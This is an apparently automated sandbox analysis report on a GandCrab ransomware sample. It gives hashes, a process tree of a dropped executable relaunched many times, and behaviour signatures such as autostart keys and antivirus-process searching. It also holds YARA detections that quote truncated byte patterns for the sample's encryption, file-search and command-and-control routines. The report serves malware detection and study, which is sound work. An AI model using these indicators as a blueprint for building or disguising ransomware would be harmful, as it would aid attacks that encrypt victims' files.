Edit tour

Windows Analysis Report
wThN5MTIsw.exe

Overview

General Information

Sample Name:	wThN5MTIsw.exe
Analysis ID:	694565
MD5:	1813521f3884de8427728b54b5c9a391
SHA1:	874f4efd9b2ba64fa3bcb6ae87b116bd526b85c3
SHA256:	4e705159b6c3a72b2b160486b9d582f05e34cd89a767428ef47ff6562b39619e
Tags:	exeGandCrab
Infos:

Detection

Gandcrab, ReflectiveLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Gandcrab

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected ReflectiveLoader

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Creates multiple autostart registry keys

Found evasive API chain (may stop execution after checking mutex)

Contains functionality to determine the online IP of the system

Found Tor onion address

Machine Learning detection for sample

May check the online IP address of the machine

Machine Learning detection for dropped file

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Queries information about the installed CPU (vendor, model number etc)

PE file contains an invalid checksum

Drops PE files

Contains functionality to read the PEB

Contains functionality to enumerate device drivers

Checks for available system drives (often done to infect USB drives)

Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

System is w10x64

wThN5MTIsw.exe (PID: 6388 cmdline: "C:\Users\user\Desktop\wThN5MTIsw.exe" MD5: 1813521F3884DE8427728B54B5C9A391)

ssapst.exe (PID: 6592 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 6840 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 7028 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 5668 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 6104 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 4292 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 1416 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 3588 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 3248 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 6228 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 5016 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 7020 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 7108 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 204 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 4804 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 5952 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 1784 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 5076 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 5700 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

ssapst.exe (PID: 972 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe" MD5: C99BAB5FEA91C0938D1D5B6684158B24)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
wThN5MTIsw.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
wThN5MTIsw.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
wThN5MTIsw.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
wThN5MTIsw.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
wThN5MTIsw.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
wThN5MTIsw.exe	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Click to see the 1 entries

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
C:\Users\user\AppData\Roaming\Microsoft\ssapst.exe	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.335673365.000000000F4EA000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000008.00000002.421043250.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000004.00000003.382524367.00000000038C0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000023.00000000.730367046.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000006.00000002.406382399.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000022.00000002.734717569.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000002.654951583.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000001E.00000003.653635490.0000000002FC0000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
0000001A.00000003.625461976.0000000003830000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
0000000C.00000002.445300926.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000021.00000003.701450302.0000000003D30000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000006.00000003.405218158.0000000002F70000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000006.00000000.391649222.000000000FE6A000.00000002.00000001.01000000.00000004.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000018.00000002.585820146.000000000FE72000.00000004.00000001.01000000.00000004.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000000.00000002.335680061.000000000F4F2000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xef92:$x1: ReflectiveLoader
00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xe8fe:$: DECRYPT.txt 0xe964:$: DECRYPT.txt
00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_ReflectiveLoader	Yara detected ReflectiveLoader	Joe Security
00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_ReflectiveLoader	detects Reflective DLL injection artifacts	ditekSHen	0xef91:$s1: _ReflectiveLoader@ 0xef92:$s2: ReflectiveLoader@
00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp	Gandcrab	Gandcrab Payload	kevoreilly	0xe5c8:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
00000020.00000003.679180879.0000000003790000.00000004.00001000.00020000.00000000.sdmp	Win32_Ransomware_GandCrab	unknown	ReversingLabs	0x48f0:$remote_connection_v2: 55 8B EC 83 EC 7C 53 56 8B D9 89 55 F0 57 8D 4D E8 89 5D F8 E8 37 29 00 00 E8 12 FD FF FF 53 89 45 F4 FF 15 60 A1 00 10 8B 35 44 A1 00 10 6A 40 68 00 30 00 00 8D 3C 45 00 04 00 00 8D 47 01 50 ... 0x4d61:$crypt_files_v2: 8B 55 0C 8B 1D 48 A0 00 10 8D 04 12 89 44 24 28 8D 44 24 28 50 51 68 01 00 00 40 52 FF 75 08 FF D3 8D 04 36 89 44 24 28 8D 44 24 28 50 57 68 01 00 00 40 56 FF 74 24 1C FF D3 8B 1D 60 A1 00 10 ... 0x61f0:$find_files_v2: 55 8B EC 81 EC 68 02 00 00 53 56 57 89 55 EC 8B F9 E8 7A F9 FF FF 85 C0 0F 84 26 01 00 00 8B CF E8 8B FD FF FF 85 C0 0F 85 17 01 00 00 E8 1E FF FF FF 57 FF 15 B0 A0 00 10 8B 35 10 A1 00 10 68 ... 0x3cd3:$search_antivirus_processes_v2: C7 44 24 18 48 F4 00 10 C7 44 24 1C 64 F4 00 10 C7 44 24 20 80 F4 00 10 C7 44 24 24 A0 F4 00 10 C7 44 24 28 BC F4 00 10 C7 44 24 2C D8 F4 00 10 C7 44 24 30 F0 F4 00 10 C7 44 24 34 04 F5 00 10 ... 0x6f70:$search_antivirus_processes_v4: 55 8B EC 83 EC 4C 53 56 8B 35 44 A1 00 10 57 6A 04 68 00 30 00 00 68 00 04 00 00 6A 00 FF D6 8B 5D 08 6A 04 68 00 30 00 00 6A 04 6A 00 89 03 C7 45 B4 AC 03 01 10 C7 45 B8 BC 03 01 10 C7 45 BC ...
